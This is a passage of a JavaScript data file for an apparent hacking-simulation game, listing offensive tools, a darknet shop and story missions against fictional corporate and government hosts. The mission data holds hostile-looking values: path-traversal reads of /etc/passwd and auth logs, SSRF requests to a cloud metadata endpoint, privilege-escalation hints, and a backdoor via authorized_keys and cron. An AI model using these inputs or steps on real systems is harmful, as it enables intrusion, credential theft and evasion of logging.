const TOOLS = {
  basic_cracker:    { name: 'Basic Cracker',       desc: 'Dictionary attack on SSH. Works on low-complexity passwords.' },
  wordlist_pro:     { name: 'Wordlist Pro',         desc: 'Extended dictionary. Cracks medium-complexity passwords.' },
  sqli_kit:         { name: 'SQLi Kit',             desc: 'Automated SQL injection toolkit for web login forms.' },
  proxy_basic:      { name: 'Basic Proxy',          desc: 'Passively routes traffic through a hop — reduces all trace by 35%.' },
  port_scanner_pro: { name: 'Port Scanner Pro',     desc: 'Deep scan reveals stealth ports and service fingerprints.' },
  bruteforce_v2:    { name: 'Bruteforce v2',        desc: 'GPU-accelerated cracker. Handles high-complexity passwords.' },
  packet_sniffer:   { name: 'Packet Sniffer',       desc: 'Capture raw network traffic. Reveals credentials in cleartext protocols like SIP and FTP.' },
  fuzzer:           { name: 'HTTP Fuzzer',          desc: 'Brute-force web paths and hidden endpoints. Auto-authenticates on vulnerable admin panels.' },
  exploit_db:       { name: 'ExploitDB Client',     desc: 'Search and deploy known CVE exploits against unpatched services.' },
  cryptobreaker:    { name: 'CryptoBreaker',        desc: 'Decrypt AES-256 encrypted files using extracted key material.' },
  log_wiper:        { name: 'Log Wiper',            desc: 'Scrub auth logs and access trails from a compromised host.' },
  steganographer:   { name: 'Steganographer',       desc: 'Extract hidden payloads from image files using LSB steganalysis.' },
  rootkit_mk2:      { name: 'Rootkit Mk.II',        desc: 'Deploy a persistent backdoor — auto-authenticates on future connections.' },
  vpn_tunnel:       { name: 'VPN Tunnel',           desc: 'Encrypt all traffic through a multi-hop chain — reduces trace gain by 50%.' },
  hash_cracker:     { name: 'Hash Cracker',         desc: 'Offline dictionary and brute-force attack against MD5, SHA-1, NTLM, and bcrypt hashes.' },
  ad_toolkit:       { name: 'AD Toolkit',           desc: 'Active Directory attack suite — Kerberoasting, AS-REP roasting, and domain path enumeration.' },
  osint_suite:      { name: 'OSINT Suite',          desc: 'Passive recon toolkit — harvests emails, subdomains, and exposed credentials from public sources.' },
  shell_builder:    { name: 'Shell Builder',        desc: 'Reverse shell payload generator — staged bash, python, and netcat payloads.' },
};

// ── Darknet Shop ──────────────────────────────────────────────
const SHOP = {
  tools: [
    { id: 'wordlist_pro',     price: 180,  name: 'Wordlist Pro',          desc: 'Cracks medium-complexity SSH passwords.' },
    { id: 'sqli_kit',         price: 240,  name: 'SQLi Kit',              desc: 'SQL injection toolkit for web login forms.' },
    { id: 'proxy_basic',      price: 300,  name: 'Basic Proxy',           desc: 'Reduces all trace gain by 35%.' },
    { id: 'port_scanner_pro', price: 400,  name: 'Port Scanner Pro',      desc: 'Reveals stealth ports hidden from basic scan.' },
    { id: 'bruteforce_v2',    price: 550,  name: 'Bruteforce v2',         desc: 'GPU cracker — handles high-complexity passwords.' },
    { id: 'packet_sniffer',   price: 280,  name: 'Packet Sniffer',        desc: 'Capture raw traffic — reveals credentials in cleartext protocols.' },
    { id: 'fuzzer',           price: 350,  name: 'HTTP Fuzzer',           desc: 'Brute-force hidden web paths and auto-auth on vulnerable panels.' },
    { id: 'exploit_db',       price: 480,  name: 'ExploitDB Client',      desc: 'Deploy CVE exploits against unpatched services.' },
    { id: 'cryptobreaker',    price: 620,  name: 'CryptoBreaker',         desc: 'Decrypt AES-256 files using extracted key material.' },
    { id: 'log_wiper',        price: 390,  name: 'Log Wiper',             desc: 'Scrub auth logs and access trails from compromised hosts.' },
    { id: 'steganographer',   price: 440,  name: 'Steganographer',        desc: 'Extract hidden payloads from image files via LSB steganalysis.' },
    { id: 'rootkit_mk2',      price: 750,  name: 'Rootkit Mk.II',         desc: 'Install persistent backdoor — auto-auth on future connects.' },
    { id: 'vpn_tunnel',       price: 900,  name: 'VPN Tunnel',            desc: 'Multi-hop encrypted chain — reduces all trace gain by 50%.' },
    { id: 'hash_cracker',     price: 320,  name: 'Hash Cracker',          desc: 'Crack MD5/SHA/NTLM/bcrypt hashes offline with dictionary attacks.' },
    { id: 'osint_suite',      price: 260,  name: 'OSINT Suite',           desc: 'Passive recon — emails, subdomains, and breached credentials.' },
    { id: 'shell_builder',    price: 310,  name: 'Shell Builder',         desc: 'Generate netcat/bash/python reverse shell payloads.' },
    { id: 'ad_toolkit',       price: 580,  name: 'AD Toolkit',            desc: 'Kerberoasting, AS-REP roasting, BloodHound-style domain mapping.' },
  ],
  upgrades: [
    { id: 'proxy_chain',      requires: 'proxy_basic',    price: 450, name: 'Proxy Chain',           desc: 'Triple-hop routing — boosts trace reduction from 35% to 60%.' },
    { id: 'wordlist_elite',   requires: 'wordlist_pro',   price: 380, name: 'Wordlist Elite',        desc: 'Optimised chains — medium SSH crack faster and lower trace.' },
    { id: 'exploit_kit',      requires: 'sqli_kit',       price: 600, name: 'Exploit Kit',           desc: 'Zero-days included — inject works on hardened web targets.' },
    { id: 'gpu_cluster',      requires: 'bruteforce_v2',  price: 700, name: 'GPU Cluster',           desc: 'Distributed nodes — high-complexity crack twice as fast.' },
    { id: 'deep_packet',      requires: 'packet_sniffer', price: 420, name: 'Deep Packet Inspector', desc: 'Full protocol decode — sniff reveals passwords, not just metadata.' },
    { id: 'fuzz_turbo',       requires: 'fuzzer',         price: 500, name: 'Fuzz Turbo',            desc: 'Parallelised engine — faster fuzzing and 30% lower trace on HTTP.' },
    { id: 'zero_day',         requires: 'exploit_db',     price: 850, name: 'Zero-Day Bundle',       desc: 'Unreleased CVE exploits — bypass even hardened SSH without a crack.' },
    { id: 'john_rules',       requires: 'hash_cracker',  price: 380, name: 'John Rules',            desc: 'Advanced wordlist mutation — cracks complex hashes faster with rule-based transforms.' },
    { id: 'osint_deep',       requires: 'osint_suite',   price: 420, name: 'OSINT Deep',            desc: 'Dark web scan — finds breached credentials and internal document leaks.' },
    { id: 'ad_extended',      requires: 'ad_toolkit',    price: 650, name: 'AD Extended',           desc: 'Full BloodHound + LDAP enum — maps attack paths and group policy abuse vectors.' },
  ],
  bribes: [
    { id: 'ghost_protocol', price: 120, name: 'Ghost Protocol', desc: 'Flush your current trace to 0. Use any time mid-op.' },
    { id: 'fixer',          price: 250, name: 'Fixer',          desc: 'Crooked contact scrubs 20 heat off your record.' },
    { id: 'insider',        price: 200, name: 'Insider',        desc: 'Bribe a target sysadmin — auto-authenticates your active connection.' },
    { id: 'intel_drop',     price: 150, name: 'Intel Drop',     desc: 'Anonymous tip reveals all files on the current target.' },
    { id: 'cleaner',        price: 350, name: 'The Cleaner',    desc: 'Professional log sanitiser — wipe host logs without needing Log Wiper.' },
    { id: 'mole',           price: 280, name: 'The Mole',       desc: 'Insider at target org — reveals all hidden ports and file paths.' },
  ],
};

const MISSIONS = [
  {
    id: 'a1m1',
    act: 1,
    title: 'First Contact',
    objective: 'Download credentials.txt from 10.0.0.12',
    briefing: [
      { type: 'sys',  text: '[ ENCRYPTED MESSAGE — 03:47:22 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'They know what your mentor found.' },
      { type: 'info', text: 'The evidence is buried in Veridian Corp\'s network.' },
      { type: 'info', text: 'Start small — they have an exposed internal server.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.0.0.12' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Get in. Find the credentials file. Get out.' },
      { type: 'dim',  text: 'Type "help" to see available commands.' },
    ],
    target: {
      ip:       '10.0.0.12',
      hostname: 'veridian-srv-01',
      ports: {
        22:  { service: 'SSH',   banner: 'OpenSSH 7.4 — Veridian Internal', crackable: true,  password: 'password123', complexity: 'low' },
        80:  { service: 'HTTP',  banner: 'Apache/2.4.6 — Veridian Portal',  crackable: false },
        443: { service: 'HTTPS', banner: 'SSL/TLS',                         crackable: false },
      },
      files: {
        'readme.txt':      'Server maintenance log\nLast updated: 2026-04-01\nAdmin: sysadmin@veridian.corp',
        'credentials.txt': 'admin:hunter2\nbackup_user:letmein\ndb_reader:Veridian2024!',
        'server.log':      '[INFO] System boot OK\n[INFO] SSH daemon started\n[WARN] Failed login from 10.0.0.89\n[INFO] User "admin" logged in from 10.0.0.1',
      },
      enumVectors: [
        'SUID binary found: /usr/bin/find  — can be abused via GTFOBins',
        'Writable cron job: /etc/cron.d/backup  — owned by sysadmin group',
        'Sudo rule: sysadmin ALL=(ALL) NOPASSWD: /usr/bin/vim',
        'Kernel: Linux 4.4.0-116 — vulnerable to CVE-2017-16995 (eBPF privesc)',
      ],
      privescVuln: 'sudo_vim',
      dumpFile: {
        name: 'shadow.txt',
        content: [
          '# /etc/shadow — cracked by Hash Cracker',
          'root:$6$rounds=5000$randomsalt$HASH_A:19000:0:99999:7:::',
          'admin:$6$rounds=5000$randomsalt$HASH_B:19000:0:99999:7:::',
          'sysadmin:$6$rounds=5000$randomsalt$HASH_C:19000:0:99999:7:::',
          '',
          '>>> RUN "hash shadow.txt" TO CRACK <<<',
        ].join('\n'),
      },
    },
    reward:  { crypto: 50 },
    unlocks: [],
    check(G) { return G.downloadedFiles.includes('credentials.txt'); },
  },

  {
    id: 'a1m2',
    act: 1,
    title: 'The Leak',
    objective: 'Extract user_records.csv from the employee portal',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 04:12:07 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'The credentials pointed somewhere.' },
      { type: 'info', text: 'There\'s a web server on the internal network.' },
      { type: 'info', text: 'Their login form doesn\'t sanitize input.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.0.0.45' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Connect to port 80, then run "inject" to exploit the form.' },
      { type: 'dim',  text: 'New command available: inject' },
    ],
    target: {
      ip:       '10.0.0.45',
      hostname: 'veridian-web-02',
      ports: {
        80:  { service: 'HTTP',  banner: 'Apache/2.4.6 — Veridian Employee Portal', crackable: false, injectable: true },
        443: { service: 'HTTPS', banner: 'SSL/TLS — Redirect to :80',               crackable: false },
        22:  { service: 'SSH',   banner: 'OpenSSH 8.1 — Hardened',                  crackable: false },
      },
      files: {
        'user_records.csv':  'id,name,email,dept\n1,Marcus Webb,m.webb@veridian.corp,Engineering\n2,Diana Cross,d.cross@veridian.corp,Executive\n3,Yusuf Karim,y.karim@veridian.corp,Security',
        'internal_memo.txt': '[CONFIDENTIAL]\nAll staff: the Q2 audit has been moved forward.\nDo not discuss Project Helios externally.\n— D. Cross, CEO',
      },
      lfiPaths: {
        '../../etc/passwd':  'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nveridian:x:1001:1001::/home/veridian:/bin/bash',
        '../../etc/hosts':   '127.0.0.1 localhost\n10.0.0.1  veridian-gw\n10.0.0.12 veridian-srv-01\n10.0.0.45 veridian-web-02\n10.0.0.91 veridian-exec-ceo\n172.20.0.2 helios-internal',
        '../../var/log/auth.log': '2026-04-19 03:44:01 sshd: Accepted password for veridian from 10.0.0.1\n2026-04-19 03:47:22 sshd: Accepted password for admin from 185.220.101.47',
      },
      idorFiles: {
        param: 'user_id',
        records: {
          '1': 'id=1,name=Marcus Webb,salary=94000,clearance=L2,notes=Helios_aware',
          '2': 'id=2,name=Diana Cross,salary=580000,clearance=L5,notes=Helios_architect',
          '3': 'id=3,name=Yusuf Karim,salary=112000,clearance=L4,notes=Helios_security_lead',
          '99': 'id=99,name=VOSS_LIAISON,salary=0,clearance=L6,notes=EXTERNAL — Senator office contact',
        },
      },
      xssPayload: {
        cookieData: 'session=eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZC5jcm9zc0B2ZXJpZGlhbi5jb3JwIiwicm9sZSI6ImFkbWluIn0.STOLEN\ncsrf_token=8f3dc92a1b4e\nremember_me=veridian_admin',
      },
      ssrfTargets: {
        'http://localhost/admin': '[Veridian Internal Admin]\nHelios pipeline status: ACTIVE\nSubject count: 2,847,221\nAPI key: hlsx_31f9a2b8\n/admin/shutdown  [POST]',
        'http://169.254.169.254/latest/meta-data': '[AWS IMDSv1 — Cloud Metadata]\ninstance-id: i-0a1b2c3d4e5f\niam/security-credentials/veridian-prod-role\nAccessKeyId: AKIAIOSFODNN7EXAMPLE\nSecretAccessKey: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY',
      },
    },
    reward:  { crypto: 120 },
    unlocks: ['sqli_kit', 'wordlist_pro'],
    check(G) { return G.downloadedFiles.includes('user_records.csv'); },
  },

  {
    id: 'a1m3',
    act: 1,
    title: 'The Architect',
    objective: 'Download project_helios.enc from the executive workstation',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 05:38:44 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'The user records named her: Diana Cross, CEO.' },
      { type: 'info', text: 'Internal memo confirmed it — Project Helios is hers.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Her executive workstation sits on the internal network.' },
      { type: 'info', text: 'She uses a stronger password. Your new wordlist can handle it.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.0.0.91' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Get in. Download project_helios.enc. Don\'t leave tracks.' },
      { type: 'dim',  text: 'Hint: scan → connect 22 → crack → ls → download' },
    ],
    target: {
      ip:       '10.0.0.91',
      hostname: 'veridian-exec-ceo',
      ports: {
        22:  { service: 'SSH',   banner: 'OpenSSH 8.4 — Executive Access', crackable: true, password: 'Helios@2026!', complexity: 'medium' },
        443: { service: 'HTTPS', banner: 'SSL/TLS — Executive Portal',     crackable: false },
      },
      files: {
        'project_helios.enc': '[ENCRYPTED BINARY — AES-256]\nHeader: HELIOS_PAYLOAD_v3\nSize: 4.2 MB\nKey required.',
        'personal_notes.txt': 'Remind legal: NDA extensions for Helios staff.\nCall Senator Voss re: regulatory window.\nDestroy lab records before Q3 audit.',
        '.bash_history':      'ssh admin@172.20.0.2\nscp helios_key.bin d.cross@10.0.0.91:~\nrm -rf /tmp/staging',
      },
    },
    reward:  { crypto: 200 },
    unlocks: ['proxy_basic'],
    check(G) { return G.downloadedFiles.includes('project_helios.enc'); },
  },

  {
    id: 'a2m1',
    act: 2,
    title: 'The Broker',
    objective: 'Download helios_key.bin from the offshore drop server',
    briefing: [
      { type: 'sys',  text: '[ ENCRYPTED MESSAGE — 11:02:17 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'You have a file. Encrypted.' },
      { type: 'info', text: 'Someone wants to keep it that way.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'The bash history pointed to an offshore relay.' },
      { type: 'info', text: 'A broker — no name, no face — pushed the key there.' },
      { type: 'info', text: 'Their login form is vulnerable. Use it.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 185.220.101.47' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 80 → inject → ls → download' },
      { type: 'dim',  text: 'Note: your proxy is active. Trace will be slower.' },
    ],
    target: {
      ip:       '185.220.101.47',
      hostname: 'broker-drop-01',
      ports: {
        80:  { service: 'HTTP',  banner: 'nginx/1.20.1 — Private File Drop', crackable: false, injectable: true },
        22:  { service: 'SSH',   banner: 'OpenSSH 9.0 — Key Auth Only',      crackable: false },
        8080:{ service: 'HTTP',  banner: 'Admin panel (restricted)',          crackable: false },
      },
      files: {
        'helios_key.bin':  '[AES KEY MATERIAL]\n0x4865 6c69 6f73 5f4b 4579 5f32 3032 3600\nAuthorised use: D.Cross / Senator Voss only.',
        'drop_manifest.txt': 'Delivery log:\n2026-03-12  helios_key.bin  → veridian-exec-ceo\n2026-03-30  blacksite_access.txt  → pending\nClient: VOSS_OFFICE',
      },
    },
    reward:  { crypto: 320 },
    unlocks: ['port_scanner_pro'],
    check(G) { return G.downloadedFiles.includes('helios_key.bin'); },
  },

  {
    id: 'a2m2',
    act: 2,
    title: 'Black Ice',
    objective: 'Download blacksite_manifest.txt from the government relay',
    briefing: [
      { type: 'sys',  text: '[ WARNING — 02:14:05 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'The drop manifest named a second delivery.' },
      { type: 'info', text: '"VOSS_OFFICE" — Senator Voss. This goes higher than Veridian.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'A government relay sits behind the senator\'s network.' },
      { type: 'info', text: 'Hardened. Non-standard ports. Rotate your scanner.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.77.0.5' },
      { type: 'warn', text: 'WARNING: This host has active intrusion detection.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Use port_scanner_pro to find the hidden SSH port.' },
      { type: 'dim',  text: 'You\'ll need Bruteforce v2 — this password won\'t fall easily.' },
    ],
    target: {
      ip:       '10.77.0.5',
      hostname: 'voss-relay-alpha',
      ports: {
        2222: { service: 'SSH',   banner: 'OpenSSH 9.3 — Hardened Gov Relay', crackable: true, password: 'V0ss#Bl4ckS1te_26', complexity: 'high', hidden: true },
        443:  { service: 'HTTPS', banner: 'SSL/TLS — Classified',             crackable: false },
        8443: { service: 'HTTPS', banner: 'SSL/TLS — Admin (cert required)',  crackable: false },
      },
      files: {
        'blacksite_manifest.txt': '[CLASSIFIED — EYES ONLY]\nProject Helios — Phase 3\nAuthorised: Senator R. Voss, D. Cross (Veridian)\nObjective: civilian data pipeline for pre-crime profiling\nStatus: ACTIVE\nCover: corporate wellness programme\nWitnesses: [REDACTED x7]',
        'access_log.txt':         '2026-04-01 AUTH OK   voss_admin from 10.77.0.1\n2026-04-02 AUTH FAIL unknown from 185.220.101.47\n2026-04-10 AUTH OK   voss_admin from 10.77.0.1',
      },
      kerberoastHashes: [
        { user: 'svc_helios',   spn: 'HTTP/helios-ctrl-primary.blacksite.int', hash: '$krb5tgs$23$*svc_helios$BLACKSITE.INT$HTTP/helios-ctrl-primary*$A1B2C3...TRUNCATED' },
        { user: 'svc_pipeline', spn: 'MSSQLSvc/helios-db.blacksite.int:1433',  hash: '$krb5tgs$23$*svc_pipeline$BLACKSITE.INT$MSSQLSvc/helios-db*$D4E5F6...TRUNCATED' },
      ],
      asrepHashes: [
        { user: 'relay_nopreauth', hash: '$krb5asrep$23$relay_nopreauth@BLACKSITE.INT:7G8H9I...TRUNCATED' },
      ],
      adGraph: {
        domain: 'BLACKSITE.INT',
        users:  ['voss_admin', 'svc_helios', 'svc_pipeline', 'relay_nopreauth'],
        groups: { 'Domain Admins': ['voss_admin'], 'Helios Operators': ['svc_helios', 'svc_pipeline'] },
        paths:  ['relay_nopreauth → Helios Operators (via nested group) → svc_helios → Domain Admins'],
      },
      pivotRoutes: ['10.50.0.1', '172.20.1.100', '10.0.3.14'],
      osintDomain: 'voss-relay-alpha.blacksite.int',
    },
    reward:  { crypto: 500 },
    unlocks: ['bruteforce_v2', 'packet_sniffer'],
    check(G) { return G.downloadedFiles.includes('blacksite_manifest.txt'); },
  },

  {
    id: 'a2m3',
    act: 2,
    title: 'The Telecom',
    objective: 'Capture VoIP credentials from the Blacksite comms relay (172.16.10.5)',
    briefing: [
      { type: 'sys',  text: '[ ENCRYPTED MESSAGE — 14:55:09 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Good work. The manifest is out there now.' },
      { type: 'info', text: 'But Voss is still talking. His operation runs through' },
      { type: 'info', text: 'a private SIP gateway — Voice-over-IP, unencrypted.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'SIP (port 5060) passes credentials in plaintext.' },
      { type: 'info', text: 'A packet sniffer on a live connection will capture them.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 172.16.10.5' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 5060 → sniff → download voip_creds.pcap' },
      { type: 'dim',  text: 'New command: sniff — passive capture on active connection.' },
    ],
    target: {
      ip:       '172.16.10.5',
      hostname: 'blacksite-sip-gw',
      ports: {
        5060: { service: 'SIP',  banner: 'Asterisk PBX 18.12 — Blacksite Comms', crackable: false },
        22:   { service: 'SSH',  banner: 'OpenSSH 9.1 — Key Auth Only',           crackable: false },
        443:  { service: 'HTTPS',banner: 'SSL/TLS — Admin (cert required)',        crackable: false },
      },
      files: {
        'pbx_status.txt': 'Asterisk PBX — Blacksite Internal\nRegistered extensions: 12\nActive calls: 0\nUptime: 47d 3h',
      },
      captureFiles: {
        'voip_creds.pcap': [
          '=== PACKET CAPTURE — SIP REGISTER ===',
          'Timestamp:  2026-04-19 14:43:12 UTC',
          'Protocol:   SIP/2.0 (UDP, CLEARTEXT)',
          '',
          'REGISTER sip:172.16.10.5 SIP/2.0',
          'From: <sip:voss_admin@blacksite.int>',
          'Authorization: Digest username="voss_admin"',
          '  realm="blacksite.int"',
          '  uri="sip:172.16.10.5"',
          '  nonce="7f3dc92a"',
          '',
          '>>> PLAINTEXT CREDENTIAL EXTRACTED <<<',
          'Username: voss_admin',
          'Password: T3l3c0m_Bl4ckS1te!',
          'Realm:    blacksite.int',
          '=====================================',
        ].join('\n'),
      },
    },
    reward:  { crypto: 750 },
    unlocks: ['fuzzer'],
    check(G) { return G.downloadedFiles.includes('voip_creds.pcap'); },
  },

  {
    id: 'a2m4',
    act: 2,
    title: 'CryptoVault',
    objective: 'Download wallet_seeds.db from the Blacksite crypto wallet server',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 16:20:31 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'The VoIP logs reference a payment server.' },
      { type: 'info', text: 'Voss is moving crypto — 800+ BTC untraceable.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'The wallet server has a web interface.' },
      { type: 'info', text: 'No injectable forms — but there are hidden admin paths.' },
      { type: 'info', text: 'Run the fuzzer to brute-force directory names.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 192.168.20.8' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 80 → fuzz → ls → download wallet_seeds.db' },
      { type: 'dim',  text: 'New command: fuzz — directory brute-force on HTTP targets.' },
    ],
    target: {
      ip:       '192.168.20.8',
      hostname: 'blacksite-wallet-01',
      ports: {
        80:   { service: 'HTTP', banner: 'nginx/1.22.0 — Wallet Management Interface', crackable: false, fuzzable: true },
        22:   { service: 'SSH',  banner: 'OpenSSH 9.2 — Key Auth Only',                crackable: false },
        8443: { service: 'HTTPS',banner: 'SSL/TLS — Internal API',                     crackable: false, hidden: true },
      },
      files: {
        'index.html': '<!-- Wallet Management Interface v2.1 -->\n<title>WMI</title>\n<p>Authorised access only.</p>',
      },
      fuzzFiles: {
        'wallet_seeds.db': [
          '-- BIP39 Wallet Seed Database --',
          'wallet_id | seed_phrase                                  | balance_btc',
          '----------|----------------------------------------------|------------',
          'W-001     | arrow castle drift flame grant humid iris...  | 14.8821',
          'W-002     | bleak copper dune ember fawn ghost hinge...   |  7.2204',
          'W-003     | VOSS_OPERATIONAL_FUND                         | 892.4450',
          '',
          'Owner:    Senator R. Voss (alias: NightOwl_BTC)',
          'Note:     Rotate seeds after Q2 transfer. DO NOT STORE PLAINTEXT.',
        ].join('\n'),
        'admin_config.json': '{"db_host":"localhost","db_pass":"Wllt@dm1n!","backup_server":"10.50.0.1","backup_key":"helios_derived_v3"}',
      },
    },
    reward:  { crypto: 1200 },
    unlocks: ['exploit_db', 'log_wiper'],
    check(G) { return G.downloadedFiles.includes('wallet_seeds.db'); },
  },

  {
    id: 'a2m5',
    act: 2,
    title: 'Cleanup Crew',
    objective: 'Wipe the auth logs on the Blacksite log server (10.10.50.3)',
    briefing: [
      { type: 'sys',  text: '[ URGENT — 18:07:44 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'You\'ve been active. Too active.' },
      { type: 'info', text: 'Voss\'s security team is reviewing relay logs.' },
      { type: 'info', text: 'Your IPs, timestamps, file transfers — all in /var/log/auth.log.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Get into the central log server and wipe everything.' },
      { type: 'info', text: 'Log Wiper will scrub auth entries without crashing the service.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.10.50.3' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 22 → crack → wipe' },
      { type: 'dim',  text: 'New command: wipe — scrub auth logs on authenticated host.' },
    ],
    target: {
      ip:       '10.10.50.3',
      hostname: 'blacksite-log-srv',
      ports: {
        22:  { service: 'SSH',  banner: 'OpenSSH 8.9 — Log Server', crackable: true, password: 'logadm1n!', complexity: 'medium' },
        514: { service: 'Syslog', banner: 'rsyslog 8.2102 — Central Log Aggregator', crackable: false, hidden: true },
      },
      files: {
        'auth.log': [
          '2026-04-18 22:11:04 sshd[1842]: Accepted password for voss_admin from 10.77.0.1',
          '2026-04-19 01:32:17 sshd[2201]: Accepted password for relay_svc from 172.16.10.5',
          '2026-04-19 02:48:55 sshd[2389]: Accepted password for unknown from 185.220.101.47',
          '2026-04-19 03:47:22 sshd[2541]: Accepted password for unknown from 185.220.101.47',
          '2026-04-19 14:43:12 sshd[3102]: Failed password for root from 185.220.101.47',
          '>>> YOUR IP IS IN THIS LOG. WIPE IT. <<<',
        ].join('\n'),
        'syslog': '[kernel] boot OK\n[cron] daily backup completed\n[rsyslog] remote logging active on :514',
        'wtmp.log': 'Binary session log — last 90 days. Includes all successful authentications.',
      },
    },
    reward:  { crypto: 900 },
    unlocks: ['steganographer'],
    check(G) { return (G.wipedHosts || []).includes('10.10.50.3'); },
  },

  {
    id: 'a3m1',
    act: 3,
    title: 'The Art Dealer',
    objective: 'Extract hidden coordinates from exhibit_7.png on the gallery server',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — ACT 3 — 20:14:02 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'The blacksite has a physical location.' },
      { type: 'info', text: 'A money-laundering front — an online art gallery —' },
      { type: 'info', text: 'is hiding GPS coordinates inside a gallery image.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Steganography: data hidden inside image pixels.' },
      { type: 'info', text: 'LSB (Least Significant Bit) encoding — invisible to the eye.' },
      { type: 'info', text: 'Your steganographer tool can extract it.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.0.3.14' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 80 → inject → ls → stego exhibit_7.png' },
      { type: 'dim',  text: 'New command: stego <file> — extract hidden data from images.' },
    ],
    target: {
      ip:       '10.0.3.14',
      hostname: 'artfront-gallery-01',
      ports: {
        80:  { service: 'HTTP',  banner: 'Apache/2.4.54 — Mireille Gallery Portal', crackable: false, injectable: true },
        443: { service: 'HTTPS', banner: 'SSL/TLS — Mireille Gallery',              crackable: false },
        22:  { service: 'SSH',   banner: 'OpenSSH 8.0 — Hardened',                  crackable: false },
      },
      files: {
        'exhibit_7.png':    '[PNG IMAGE — 2480x3508px]\nTitle: "Absence No. 7"\nArtist: Mireille Fontenay\nSize: 4.1 MB\n[Binary data — use stego to analyse]',
        'exhibit_list.txt': 'Current Collection:\n  exhibit_1.png — "Horizon"\n  exhibit_4.png — "Fragment"\n  exhibit_7.png — "Absence No. 7"  *** FLAGGED ***\n  exhibit_9.png — "Weight"',
        'gallery_notes.txt':'Client ref: NightOwl_BTC\nPayment: 220 BTC (cleared)\nNote: Do not alter exhibit_7. Coordinates embedded per protocol.',
      },
      stegoFiles: {
        'exhibit_7.png': {
          name:    'shadow_coordinates.txt',
          content: [
            '=== LSB STEGANOGRAPHY — EXTRACTED PAYLOAD ===',
            'Method:  LSB encoding, channels: R+G, depth: 2-bit',
            '',
            'BLACKSITE PHYSICAL COORDINATES',
            'Lat:  51.4545° N',
            'Lon:   0.9787° W',
            'Grid: SU 47219 14903 (OS National Grid)',
            '',
            'Facility: Helios Processing Centre',
            'Access:   Sub-basement B3, key card + biometric',
            'Destroy after memorising. — D.Cross',
            '=============================================',
          ].join('\n'),
        },
      },
    },
    reward:  { crypto: 1500 },
    unlocks: ['rootkit_mk2'],
    check(G) { return G.downloadedFiles.includes('shadow_coordinates.txt'); },
  },

  {
    id: 'a3m2',
    act: 3,
    title: 'Persistent Threat',
    objective: 'Install a persistent backdoor on the Blacksite control server (172.20.1.100)',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 21:38:55 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'You have the coordinates. But you need insurance.' },
      { type: 'info', text: 'The blacksite control server manages Helios Phase 3.' },
      { type: 'info', text: 'If they patch or rotate credentials, you lose access.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Install a rootkit — a persistent backdoor that survives' },
      { type: 'info', text: 'reboots and credential changes. It writes an SSH key' },
      { type: 'info', text: 'to /root/.ssh/authorized_keys and a cron re-installer.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 172.20.1.100' },
      { type: 'warn', text: 'WARNING: High-value target. IDS is active.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 22 → crack → persist' },
      { type: 'dim',  text: 'New command: persist — install Rootkit Mk.II backdoor.' },
    ],
    target: {
      ip:       '172.20.1.100',
      hostname: 'helios-ctrl-primary',
      ports: {
        22:   { service: 'SSH',  banner: 'OpenSSH 9.0 — Helios Control', crackable: true, password: 'H3l10s_Ctrl#2026', complexity: 'high' },
        8080: { service: 'HTTP', banner: 'Helios Admin Panel (localhost only)', crackable: false, hidden: true },
        5432: { service: 'PSQL', banner: 'PostgreSQL 14 — Helios DB',     crackable: false, hidden: true },
      },
      files: {
        'helios_status.txt':  'Helios Phase 3 — OPERATIONAL\nPipeline: ACTIVE\nSubjects enrolled: 2,847,221\nData feed: live\nNext audit: 2026-05-01',
        'crontab.root':       '#  Helios maintenance\n0 3 * * * /opt/helios/bin/backup.sh\n0 6 * * * /opt/helios/bin/sync_pipeline.sh',
